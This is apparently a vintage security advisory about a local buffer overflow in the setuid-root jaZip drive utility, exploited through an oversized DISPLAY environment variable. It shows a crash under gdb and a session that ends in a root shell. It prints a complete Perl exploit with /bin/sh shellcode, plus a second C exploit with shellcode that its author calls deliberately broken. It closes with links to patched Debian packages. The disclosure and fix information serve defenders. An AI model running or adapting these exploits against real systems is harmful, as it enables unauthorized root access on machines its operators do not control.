COMMAND
jaZip
SYSTEMS AFFECTED
jaZip
PROBLEM
teleh0r found following. jaZip is a program for managing an
Iomega Zip or Jaz drive. It is often installed setuid root - and
because of a buffer overflow it is possible for regular users to
become root.
Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/RPMS/jaZip-0.32-2.i386.rpm
Let's see:
[root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
[root@localhost /root]# gdb /usr/X11R6/bin/jazip
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
(gdb) r
Starting program: /usr/X11R6/bin/jazip
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
----
[teleh0r@localhost teleh0r]$ rpm -q jaZip
jaZip-0.32-2
[teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
Address: 0xbffff7ac
bash#
Exploit follows:
#!/usr/bin/perl
## jaZip Exploit / Tested version: jaZip-0.32-2 / anno 2000
## teleh0r@doglover.com / http://teleh0r.cjb.net/
$shellcode = # Shellcode by: Taeho Oh
"\xeb\x1f". #/* jmp 0x1f */
"\x5e". #/* popl %esi */
"\x89\x76\x08". #/* movl %esi,0x8(%esi) */
"\x31\xc0". #/* xorl %eax,%eax */
"\x88\x46\x07". #/* movb %eax,0x7(%esi) */
"\x89\x46\x0c". #/* movl %eax,0xc(%esi) */
"\xb0\x0b". #/* movb $0xb,%al */
"\x89\xf3". #/* movl %esi,%ebx */
"\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */
"\xcd\x80". #/* int $0x80 */
"\x31\xdb". #/* xorl %ebx,%ebx */
"\x89\xd8". #/* movl %ebx,%eax */
"\x40". #/* inc %eax */
"\xcd\x80". #/* int $0x80 */
"\xe8\xdc\xff\xff\xff". #/* call -0x24 */
"/bin/sh"; #/* .string \"/bin/sh\" */
$ret = 0xbffff7ac; # May have to be modified.
$len = 2100;
$nop = 'A';
if (@ARGV == 1) {
$offset = $ARGV[0];
}
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret = pack('l',($ret + $offset));
$buffer .= $nop x 3; # May have to be modified.
for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}
if ($ENV{'DISPLAY'}) {
delete($ENV{'DISPLAY'});
}
local($ENV{'DISPLAY'}) = $buffer;
exec("/usr/X11R6/bin/jazip");
Here is another exploit:
/*
* jaZip-0.32 local buffer overflow exploit (tested on debian)
*
* usage is: ./jazip-exp <offset> <align>
* offset: 1500 x N (where N is positive or negative number)
* align: 1-3 (0 is def.)
*
* This exploit is heavily broken, to prevent scriptkiddie abuse!
* Thanks to d-blood for helping me with the shellcode.
*
* c0ded by: needler @ efnet <n33dl3r@hotmail.com>
*
* Oh btw.. fuck college, I'm gonna be a pro CS player.
*/
#include <stdio.h>
#include <stdlib.h>
#define BSIZE 2080
#define NOPS 1500
char shellcode[] =
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
int
main(int argc, char **argv, char **envp) {
char overflow[BSIZE];
int i, align = 0, offset = 0;
u_long addy = 0xbffff9e5;
if( argc > 1) offset = atoi(argv[1]);
if( argc > 2) align = atoi(argv[2]);
memset(overflow, 0x90, BSIZE);
memcpy(&overflow[NOPS], shellcode, strlen(shellcode));
memcpy(overflow, "DISPLAY=", 8);
for( i = (NOPS + strlen(shellcode)); i < BSIZE; i += 4)
*(long *)&overflow[i+align] = addy + offset;
envp[0] = overflow;
printf("Using address 0x%x\n", addy + offset);
// execl("/usr/X11R6/bin/jazip", "jazip", NULL);
}
SOLUTION
For Debian Linux:
http://security.debian.org/dists/stable/updates/main/source/jazip_0.33-1.dsc
http://security.debian.org/dists/stable/updates/main/source/jazip_0.33-1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/jazip_0.33.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-i386/jazip_0.33-1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/jazip_0.33-1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/jazip_0.33-1_sparc.deb
http://security.debian.org/dists/stable/updates/main/binary-alpha/jazip_0.33-1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/jazip_0.33-1_powerpc.deb
Author of package provided fixed version 0.33.